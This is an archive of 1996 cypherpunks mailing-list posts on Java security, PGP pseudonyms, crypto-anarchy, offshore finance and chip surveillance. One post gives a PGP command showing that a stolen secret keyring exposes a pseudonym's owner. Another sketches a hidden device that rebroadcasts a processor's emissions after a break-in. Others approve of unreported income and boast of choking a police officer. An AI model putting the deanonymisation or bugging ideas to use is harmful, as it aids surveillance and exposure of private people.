> within the next few years, as popular crypto begins to cut off their
> money supply. 

False on two counts:   

First "frenzy" is exactly the opposite of what the 
government needs to stay in one piece, to continue 
to be a government.

Secondly, when you cut of someones air supply, 
they do not necessarily defend themselves.

I think I may have reported in cypherpunks my 
little experiment in Cuba when I cut off a cop's 
air supply, to test my hypothesis that even the 
cuban cops have a slave mentality.

People frequently fail to defend themselves, 
when suitably intimidated, and this is basically what 
governments rely upon.  If governments have to start
pulling guns all the time, they will fall.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 29 Apr 1996 10:46:55 +0800
To: Rich Graves <attila@primenet.com>
Subject: Re: code vs cypher
Message-ID: <199604282111.OAA25863@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:41 AM 4/28/96 -0700, Rich Graves wrote:
> I'm learning how to resist being trolled -- Michael
> Loomis's laughable "Rich Graves, Holocaust fetishist" was a good test),

I believe Rich Loomis was referring to the fact that this is cypherpunks
not holocaust punks.

You continually bring up this irrelevant topic whenever someone complains
about your egregious statism on other issues:  

We are sick to the back teeth with hearing what a good guy you have been
on Nazism and the holocaust.  We do not give a shit.  We gave a
shit the first time, but we are up to about the hundredth time
and counting.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 29 Apr 1996 11:22:50 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
In-Reply-To: <199604281940.OAA01010@proust.suba.com>
Message-ID: <199604282116.OAA28028@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim <cp@proust.suba.com> writes:

 > I like Java -- I'm not a professional programmer, and Java
 > is a lot easier for me to work with than C++.  And I can buy
 > the argument that for many people the benefits of applets
 > will outweigh the security risks.

I hope everyone here realizes that Java is not just about
Applets. Applets are simply one of many abstract classes in Java,
suitable for further refinement into things that get plugged into
Web pages.

Java itself is a full-blown programming language, like C or C++,
with command line processing conventions, runtime libraries, and
all the other amenities of procedure-oriented programming
languages.  You can write anything you want in Java, and execute
the program at a shell prompt by simply typing its name followed
by some arguments.  (Perhaps you might have to alias "name" to
"java name", but you get the general idea)

While the security issues being discussed are indeed important
for Applets, where untrusted code from God-knows-where comes into
intimate contact with the program visible decor of ones platform,
they are less important when Java is used as an ordinary
programming language, in order to take advantage of its
platform-independence and incorruptable run-time structure.

Again, this is not directed at Alex or anyone else specifically,
but some of the messages I have read here recently have given the
distinct impression that people are thinking of Java as a
language solely for writing Applets, as opposed to something more
general and a bullet-proof replacement for C++ and C.

I think we'll be seeing a lot of things written in Java in the
future.  A good first start would be a set of Daemons for Unix
which run on any platform and are totally immune to the
buffer-overrun type holes which permit people to easily break
into systems.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Marshall <brucem@wichita.fn.net>
Date: Mon, 29 Apr 1996 07:57:52 +0800
To: cypherpunks@toad.com
Subject: Re: trusting the processor chip
In-Reply-To: <Pine.3.89.9604261948.A21433-0100000@netcom9>
Message-ID: <Pine.BSI.3.91.960428141110.9821A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Apr 1996, Zach Babayco wrote:

> Actually, the report said that the NSA had made chips with a virus on 
> them, and that it supposedly knocked out some of their computers.  I 
> think it was U.S. World & News that ran the story as fact, and stood by 
> it even when it was proven to be false.  Makes you wonder if the media 
> bothers to do any fact-checking when reporting, especially when reporting 
> on computer topics these days.

    Fact-checking often takes second priority to releasing "ground 
breaking" news.  BTW, I stil have the original article that appeared 
about the NSA's alleged chip swap operation.

Bruce Marshall




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 29 Apr 1996 09:22:23 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
In-Reply-To: <199604280704.DAA06780@jekyll.piermont.com>
Message-ID: <199604281940.OAA01010@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>From the begining of the Java discussion on this list, Perry has been
predicting that a continuous series of security holes would be discovered
in Java implementations.

So far he's been proven right.

I like Java -- I'm not a professional programmer, and Java is a lot easier
for me to work with than C++.  And I can buy the argument that for many
people the benefits of applets will outweigh the security risks.  I'm 
willing to run sendmail, and I'm willing to run Java as well.  I'm not 
working in a finance house, and there's not anything that sensitive on my 
machine.

It also seems likely to me that Java secure mail applets and remailer
clients will do a lot of good from a cypherpunk point of view.  Java looks
like it's going to put easy to use gui crypto tools within reach of
everyone with a web browser.

So I'd like to see Java catch on, as long as users are allowed to make 
informed decisions about the risks and the benefits of running applets.

But Perry has a track record on this issue (and on many other issues as
well).  I don't think many people here are going dismiss what he's saying
because someone called him a food fighter.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Mon, 29 Apr 1996 11:51:37 +0800
To: cypherpunks@toad.com
Subject: Re: Mindshare and Java
In-Reply-To: <199604272256.PAA02672@netcom20.netcom.com>
Message-ID: <3183E853.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:
> 
> Some of the things a valid signature from Jack the Ripper means:
> 
> 1. If it breaks something, I can send Jack the Ripper a bug report, or
>    a flame, as appropriate.
> 2. If I like it, I can send Jack the Ripper money or other form of
>    good vibes.
> 6. I have a way of knowing if Alice or Bob stuck a virus or trojan
>    into Jack's code.

Yep, these are true.

> 3. If I am Jack the Ripper, I have a way of proving that the code is
>    my intellectual property.

How do you prove that?  If I strip off your signature and sign it
myself, how do you know it's yours?

> 4. If I'm not Jack the Ripper, I can say "That wasn't me."

No you can't.  How do I know that Jack isn't a nym of yours?

> 5. If I am GNU, I can advertise and "enforce" my copyleft policy.

How?

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 29 Apr 1996 12:02:50 +0800
To: Jonathon Blake <grafolog@netcom.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <m0uDeWY-000900C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:50 PM 4/28/96 +0000, Jonathon Blake wrote:
>	Jim:
>
>On Sun, 28 Apr 1996, jim bell wrote:
>
>> Government feeds on its own size; once government is dramatically reduced 
>> below its current size, it will become even less able to resist further 
>
>	The only true part of this paragraph is that government feeds	
>	on its own size.  
>
>> contraction.  Probably few government employees realize this.
>
>	What was the name of that government department that was
>	created to obtain and store Helium for the US dirigible 
>	fleet?   And just how recently was it abolished.

I don't see that what you said challenged what I said.  For most of this century, government (and in particular, the Federal government) has been on a fast-track to expansion.  Only quite recently has this expansion begun to slow.  I was referring to contractions to come; not to contractions (if any?) that have occurred in the past.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 29 Apr 1996 12:38:07 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <Pine.3.89.9604281554.A30287-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SUN.3.91.960428143454.11667B-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 28 Apr 1996 s1113645@tesla.cc.uottawa.ca wrote:

> I don't think the rich are really the issue. From what Sandy, Black 
> Unicorn and others write, it looks like those of the rich who are 
> self-employed already play these shell games to a certain extent and a 
> certain amount competition and thumb-screwing already happens.
> 
> What is interesting is how it applies to the middle-class, where most of 
> the tax-base is.  

[He/She then goes on to write a very well thought out analysis of 
the ramifications of crypto-anarchy.]

It used to be that only the rich owned cars, went on cruises or
flew in airplanes.  Now almost every person of moderate or even
modest means can do all three.  The same tread can also be seen
in the use of offshore techniques.

A couple of generations ago, only multinationals and the super
rich could avail themselves of offshore banks, asset protection
trust, foreign incorporation, etc.  Fifteen years ago, I was 
helping members of the upper middle class do the same think.

Today, virtually anyone on this list can afford these techniques.
Non-US people have been using them for years.  The reason middle
class Americans aren't savvy that yet are ignorance and inertia.  
Everyday, Americans are becoming less parochial (due in part,
ironically, to government hysteria about money laundering) about
such possibilities.  As the Clintons and Doles turn up the tax
and regulatory heat, they will also overcome their inertia.  

Another irony in America is that the lower class seems to be
way ahead of the middle class in keeping more of what they earn.
Do you think ANY waiter/waitress in the U.S. reports all his/her
tips?  Do you really think the neighbor who helped you tune up 
your car last week will pay taxes on what you paid him?  Watch
where the money goes when you pay for an item in a mom and pop 
grocery.  Sometimes it goes in the till, other times, in the 
owner's pocket. 


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Mon, 29 Apr 1996 12:00:24 +0800
To: cypherpunks@toad.com
Subject: PGP and pseudonyms
Message-ID: <Pine.BSF.3.91.960428145038.10410A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


Suppose someone were using a pseudonym, and had a seperate PGP key for
this pseudonym. If this person's secret keyring were stolen, could
person=pseudonym be revealed, based on the key ID? Or would it require
knowing the passphrase? 

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Mon, 29 Apr 1996 12:08:33 +0800
To: cypherpunks@toad.com
Subject: Re: code vs cypher
In-Reply-To: <199604270331.UAA23746@infinity.c2.org>
Message-ID: <Pine.BSF.3.91.960428150833.10410B-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> pm> It is neither elite nor secret. It is fairly high signal to noise.
> pm> I think only about one in every fifty or so cypherpunks
> pm> messages has any content at all worth mentioning.
> 
> Agreed!  I wasn't "invited".  I simply requested access and
> was quickly welcomed to the list.

Hmm... I sent out a "subscribe coderpunks" to majordomo@toad.com three
days ago, and I recieved the "your message has been forwarded to the list
owner" message, but nothing else.

It wouldn't suprise me to find I'm just not 'elite' enough, but I'll wait
and see what coderpunks-approval@toad.com has to say. 

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Snow <snow@crash.suba.com>
Date: Mon, 29 Apr 1996 09:49:31 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: trusting the processor chip
In-Reply-To: <m0uDEIm-00093vC@pacifier.com>
Message-ID: <Pine.LNX.3.91.960428150426.2054A-100000@crash.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



	I realize that when one argues with a fool, no one can tell the 
difference, but as the dumbest person on the list, I figure I can learn 
from just about anyone here. Not that I am calling Mr. Bell a fool.

On Sat, 27 Apr 1996, jim bell wrote:
> At 12:25 AM 4/27/96 -0500, Snow wrote:
> >On Thu, 25 Apr 1996, jim bell wrote:
> >> product is subverted.  More likely,I think, an organization like the NSA 
> >	I thought that most (all?) chips already radiated on the 
> >electromagnetic spectrum? Isn't that what tempest is about?
> There's a difference between trying to find a needle in a haystack, and 
> finding a day-glo, red-hot needle that plays music at 110 decibels in that 
<snip>
> The best place to put such a chip would be a location outside the computer's 
> relatively small number of different designs.

	I still maintain that this would be less feasible than either:

	a) Tempest. Why bother resubverting each new processor (think 
about it, Which processor? Intel (all variants) Motorola (all variants), 
Digital (Alpha) etc. When it would be easier (It seems to me at least) to 
develop a system that _can_ find that needle in a hay stack, and simply 
develop translators for each kind of chip (which could be done in 
software I'd think) to show what the chip is doing. 

	b) physcailly compromising the work enviroment so that you see 
what the person is typing as well as what is on the screen. As well as 
get Voice etc.

	c) This I just thought of, and is kind of a hybrid of Mr. Bells 
idea and a tempest style attack, it isn't thought through real well, but 
I _think_ it would work. 

	Each processor would emit on a certain band, so you build a 
"repeater" that takes that band, encodes it, steps it to a different band 
and retrans it. This device probably could be made small enough to fit 
_easily_ inside a case, and draw very little power (the transmitting 
distance would not need to very far) and since most people never open 
their cases, it would be fairly safe from detection. It could even be 
designed to piggyback on common device interface cards (parallel/serial 
cards, Video cards) so that even if one _did_ open ones case you probably 
wouldn't notice.
	All that this would entail _after_ development would be a simple 
B&E. This wouldn't solve the problem of decoding, but it heats the 
needle, and makes it sound off at many times less cost than subverting 
the chip. 

Petro, Christopher C.
petro@suba.com <prefered>
snow@crash.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 29 Apr 1996 16:03:52 +0800
To: cypherpunks@toad.com
Subject: Re: Book: The President's Eyes Only
Message-ID: <m0uDfdU-00091FC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:08 AM 4/28/96 -0700, rick hoselton wrote:
>I just finished reading "For the President's Eyes Only", 
>a book by Christopher Andrew. [stuff deleted]

>I suppose I tended to look upon ITAR restrictions on cryptography 
>as a sign of a power-hungry, self-agrandizing, government that has 
>lost track of the fact that its legitimacy depends on protecting 
>the blessings of liberty for its citizens.  That's partly true, 
>but there's more to it than that.  
>
>After reading "For the President's Eyes Only", I can understand that 
>many in government believe that they are protecting the public by 
>outlawing cryptography.  After careful reconsideration, I still 
>believe in strong free crypto, but it made me think very hard.
>I think that some on this list and in sci.crypt should be ashamed of 
>their ad hominem attacks in an area where reasonable people disagree. 
>
>The crypto-game is being played "for keeps".  Someday, all crypto 
>may be too strong to break, but for right now, many "bad guys" 
>(and whatever your philosophy, I bet you can find some) use weak 
>crypto, and this allows the US Govt. to know more about what goes 
>on in the world. 

Here's one reason why I object to this.  While "reasonable people" occasionally disagree about things, in the political arena my experience has been that the main reason they disagree is their differing VALUES, not the interpretation of those values.  For example,  if a person simply disliked the concept of freedom (for others, anyway) or wanted to maintain the power of an existing government against future reductions based on technological developments, he'd object to the deployment of good crypto by ordinary citizens.    One could argue that his position is "reasonable" given his value system, but in reality his would be a particularly hostile position with regards to my rights.

Yes, "bad guys" exist, but for most if not all of us the vast majority of those bad guys would have no use for crypto, and probably wouldn't be able to figure out how to install and run PGP.   Only a very tiny fraction of "bad guys" would benefit from crypto, yet that's all the government is talking about.  The reason is simple:  The government's "bad guys" are NOT OUR "bad guys", not at all.   The government is almost entirely uninterested in the common criminals who do most of the damage; it is focussing on the few people who are the biggest threat to _it_, not a threat to the public.  It is this self-interest that makes the positions of the government-apologists unreasonable, and worthy of our scorn.

Jim Bell
jimbell@pacifier.com





 As long as Uncle Sam keeps his finger on a nuclear 
>trigger, I can see a strong case that knowing what he's doing and 
>not getting too surprised are (mostly) good things.
>
>There will be a price to pay when everyone uses strong crypto.  
>There will be great benefits derived, as well.  It will be very 
>expensive, but worth it.  If we want to make it happen sooner, 
>we should understand (and respect) our opponents in this debate.
>
> 
>Rick F. Hoselton  (who doesn't claim to present opinions for others)
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 29 Apr 1996 16:16:12 +0800
To: Steve Reid <cypherpunks@toad.com
Subject: Re: PGP and pseudonyms
Message-ID: <2.2.32.19960428231217.00ac5b6c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:08 PM 4/28/96 -0700, Steve Reid wrote:
>Suppose someone were using a pseudonym, and had a seperate PGP key for
>this pseudonym. If this person's secret keyring were stolen, could
>person=pseudonym be revealed, based on the key ID? Or would it require
>knowing the passphrase? 

Yes, the person=personna would be revealed.  No, a passphrase would not be
needed.

To demonstrate try "pgp -kv secring.pgp" and see what you get.

I hope this gets fixed in PGP 3.0.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 29 Apr 1996 09:41:20 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: www.WhoWhere.com selling access to my employer's passwd file
In-Reply-To: <Pine.GUL.3.93.960427214213.9901G-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.93.960428161156.12806A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Rich Graves wrote:

> On Sat, 27 Apr 1996, Black Unicorn wrote:

> > [Unicorn of Color:]
> > I think you took my comment in a smaller scope than it was intended.
> > 
> > Use a nym.  If you want absolute privacy, work and study under a nym.
> > It's hardly difficult, you just have to start early.
> 
> I disagree that it's "hardly difficult" for most normal people. There are
> bits and pieces of helpful information around, but they tend to be in
> tax-protester-type rags that also contain a lot of loony stuff guaranteed
> to land you in jail. And many of them are just snake oil scams themselves.
> You know the difference, but I'm only starting to learn to, and Joe Schmo
> hasn't a chance.

It's an informational issue, not a logistical problem.  This much is true.

But think of it this way.  Joe Blow's house burns down, taking with it all
his documentation.  Even Joe Blow has to be able to replace it all even
with no credentials.  So what makes you and Joe Blow distinct when you're
standing in line to get those credentials?  That should give you some idea
of the (lack of) difficulty.

> 
> Anyway, I can't work for an organization like Stanford University without
> a real name and Social Security number.

I challenge this assumption.

> In theory, I suppose, that real
> name and Social Security number don't need to be the only ones I have.

Precisely.
 
> > Depending on someone else (university, employer, government,
> > phonecompany etc.) to protect data for you is, in my view, foolish.
> 
> In this case, I am the "someone else." How do I behave responsibly when I
> have thousands of people coming in every Fall with no clue about privacy
> issues?

[...]

> It was an uphill battle just to delink identity, location, and DNS
> registration. It used to be that you could pinpoint a student's name,
> address, and telephone number by their personal computer's static IP
> address. They weren't even told that this was possible. On yesterday's
> lovey-dovey research/educational Internet where everybody trusted
> everybody else, it was just more efficient for troubleshooters and system
> administrators to know where everybody was. Now, it's a scarier world, and
> we all know that, but it's tough convincing people to change a system that
> works. 

I applaud your efforts, but the 'one good administrator' can only do so
much.  In the end if people want privacy they have to work for it
themselves.  The goal in my view is to promote an atmosphere where that
kind of self-insurance is possible, not one that puts the responsibility
in the hands of government, or the system administrator.

> My personal choice has been (near-) complete openness, because I
> ironically feel more secure if it is trivial for certain very specific
> nutcases to verify that I pose no threat to them. I do not wish my enemies
> to be paranoid. Paranoid people break things.

The nice thing about paranoids, and other privacy invaders, is that when
they have an answer to a question they usually stop looking.  Provide them
with an answer.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 29 Apr 1996 10:33:56 +0800
To: bryce@digicash.com
Subject: Re: arbiter/escrow agent for hire
In-Reply-To: <199604281543.RAA11268@digicash.com>
Message-ID: <Pine.SUN.3.93.960428162112.12806C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996 bryce@digicash.com wrote:

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
>  Black Unicorn <unicorn@schloss.li> wrote:
> (> "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> wrote:)
> > > 	IIRC, currently Black Unicorn doesn't have any signatures on
> > > his public key of others. Therefore, this requirement, while understandable,
> > > could cause a bit of a difficulty in the current situation.
> > 
> > Please obtain a copy of my current key by finger.
> 
> 
> Oh please.  My respect for Uni's acumen just decremented a
> couple of notches.  A 2048-bit key, and no signatures?
> Rather like a front door with welded plate armor and an open
> window, no?

My key is hardly signatureless.  Please obtain a current copy.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 29 Apr 1996 09:30:09 +0800
To: bryce@digicash.com
Subject: Re: connecting Uni to the Web O Trust
In-Reply-To: <199604281556.RAA11900@digicash.com>
Message-ID: <Pine.SUN.3.93.960428162347.12806D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996 bryce@digicash.com wrote:

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Ya gotta get yourself connected, as the Stereo MC's said.
> 
> 
> Unfortunately I can't see anyway to gain trust in this
> pseudonym since I don't believe that the ostensible owner,
> name of "Black Unicorn", understands about how to establish
> a strong pseudonym in the Web O Trust.

(Sigh).  I'll say it yet a third time.  Get a current copy of my key which
is signed by at least three people on the web of trust.


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 29 Apr 1996 10:20:44 +0800
To: mkj@october.segno.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <199604281221.AA01603@october.segno.com>
Message-ID: <Pine.SUN.3.93.960428163305.12806E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996 mkj@october.segno.com wrote:

[...]

> Most other arguments put forth so far in this thread, about how people
> "won't stand for" certain government behaviors and so forth, I don't
> find convincing.  Modern military technologies, especially in the
> U.S., make the prospects of a sucessful popular uprising dubious.

C.f., Chechnya, Afghanistan, Vietnam, Columbia.  See Also Generally,
various and numerous publications on the successes of low and medium
intensity conflict campaigns against modern armies.

(Note that I don't think it will come to this in the United States, but
your assumption is a faulty one).

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 29 Apr 1996 10:58:02 +0800
To: mkj@october.segno.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <199604281221.AA01603@october.segno.com>
Message-ID: <Pine.3.89.9604281554.A30287-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


One of these days I'm going to learn the art of succint writing.

On Sun, 28 Apr 1996 mkj@october.segno.com wrote:

> Which brings us to the "flight of capital" issue.  Will nations be
> able to compete freely for the loyalty of the rich?  Or will the most
> powerful nations form effective coalitions, and perhaps simply bomb
> "rogue" nations into the stone age?

I don't think the rich are really the issue. From what Sandy, Black 
Unicorn and others write, it looks like those of the rich who are 
self-employed already play these shell games to a certain extent and a 
certain amount competition and thumb-screwing already happens.

What is interesting is how it applies to the middle-class, where most of 
the tax-base is. 

Imagine a world where for cost reasons most offices are VR constructs (a 
la Snow Crash and all the others) run over the net. Assume that for 
privacy reasons, nobody in their right minds goes without crypto
since any cracker could literally be recording their whole lives.
(And assume that this gets built into all the software or the users scream
murder as hard as we did when Netscape's CEO looked like he was waffling 
on GAK.)

Assume that some enterprising jurisdictions find some *reliable* means of 
automating entity creation and use of all the offshore services (creation of 
companies, trusts, doing financial transactions...) and offer a standard API
to these services, making the whole game a commodity and as easy to 
access as downloading Netscape. 

Assume that somehow secure pseudonymous financial markets can be created. 
(Big if, but also big profits) Also assume very low transaction fees as 
a result.

The result of this might be that the netshore economy might actually 
have lower overhead and an easier interface to its users than the 
physical world version. If people's easiest intro to economics and the 
job market is such a simple anarchy and the place where they get most 
of their entertainment, education and generally spend most of their lives 
is such an impossible to regulate environment, what do you think this 
bodes for state control? Or people's desire for it? There is no teacher 
like experience. 

Many of us have found it safer to use a pseudonym, sometimes even to save 
ourselves from occasional embarassment when saying stupid things 
(nevermind privacy from altavista and whowhere). I think it is natural 
for people to want such things, especially in a VR environment when 
anyone can watch you. I assume that in this the cypherpunks, roleplayers, 
MUD players, political writers and BBSers are not radical but merely 
slightly ahead of the curve. It is also not a coincidence that 
pseudonymity keeps getting reinvented in new environments. Basic human need.

These games have all been possible for quite some time in the offshore 
market and seem far more developped. I've read that there are as many 
registered corporations in the Cayman Islands as there are inhabitants. 
It might actually be less of a hassle to conduct your business as a 
corporation than as a individual. Even here in high-tax Canada there are 
nifty tax benefits (I'm told). Foreign jurisdictions might also be easier 
to deal with as a corporation (do you *really* want the Chinese government
to know that you're doing business with their people? Do you want to get 
on Saudi Arabia's blacklist?)

How do you think most people will act when they learn that just by 
putting on their glasses they could enter a tax-free jurisdiction with 
perfect privacy? THIS meme does travel.

Now many here think that unless we get chaumian ecash Real Soon Now, none 
of this will happen. I submit that there will be far more demand for it 
in the years to come than right now. Anonymous ecash is still several years
ahead of its mass-market time. I don't see how in the absence of GAK or 
any other mandated ID scheme that it will be any easier to stop it (maybe 
you do). And market share? How can VISA and Microsoft compete against 
something that lets you save on taxes (why compete *against* it when you 
can be part of it?). Marketing this is a no-brainer.

The only extra expense I can see is that if you're large enough, you might
need more accountants to help with your double-booking. (Though maybe you
could fire them all if the system is done right)

Finally, how will you regulate disputes? Last week we had just this problem.
Now imagine how these things will be resolved when real money is involved 
and force cannot be applied. Arbitration is already "in" in the real world...
It's much faster than the average court. What do you think will happen 
when enough people get exposed to that? Arbitration negotiators 
(lawyers) might be quite cheaper than real lawyers, after all there's 
less rules to learn (probably standardized and commoditized) and a global 
market of them (competition!). Markets can also be set up for 
transferable lawsuits with greater ease...

In sum we're talking about the age of the global small business. As 
long as you're in the service industry, and you don't deal with physical 
goods, even if a only few of these things happen, life will be interesting.


Ps. Micheal Froomkin disagrees with this. How for example will you escape
having your house seized, how will you convince a large institution like
his university to pay you as a longterm contractor...?

I may be unrealistic, but judging from what is happening to university 
funding in this country, the increased number of for-credit university 
courses done by video or TV (Carleton U does 'em), the increased demand 
for knowledge workers and the increase in small specialty colleges, I'd
say he might dean of the www.law.anguila.edu online law school sooner 
than he thinks. And as for his house, getting "payment" from your "employer"
(trust fund/company) only for your expenses is already quite possible and 
(so it's been said around here) seemingly legal (IANAL!) He might even 
rent it from some odd offshore real estate company (himself).
The only difference compared to now is that it might eventually become alot 
easier.

Thinking of setting up your own universities, folks?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 29 Apr 1996 15:00:12 +0800
To: cypherpunks@toad.com
Subject: Re: Proving that you're not a nym [was Re: Mindshare and Java]
In-Reply-To: <Pine.SUN.3.93.960428175310.19393A-100000@polaris.mindport.net>
Message-ID: <Pine.GUL.3.93.960428164938.13032M-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996, Black Unicorn wrote:

> On Sun, 28 Apr 1996, Rich Graves wrote:
> 
> > In this specific case, no, there is nothing you can do to prove that
> > you're not the Unicorn of Color, because there are no signatures on his
> > or her key.
> 
> Would you PLEASE, get your facts straight?
> 
> Try checking it yourself maybe, instead of assuming this to be true
> because someone else said so?

All right, all right. We surrender!

Call this a problem with the web of reputation capital, I guess. You can
be led to believe all sorts of silly things when someone you trust makes a
mistake. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 29 Apr 1996 14:59:12 +0800
To: cypherpunks@toad.com
Subject: Re: Mindshare and Java
In-Reply-To: <3183E853.41C6@netscape.com>
Message-ID: <Pine.GUL.3.93.960428165347.13032N-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


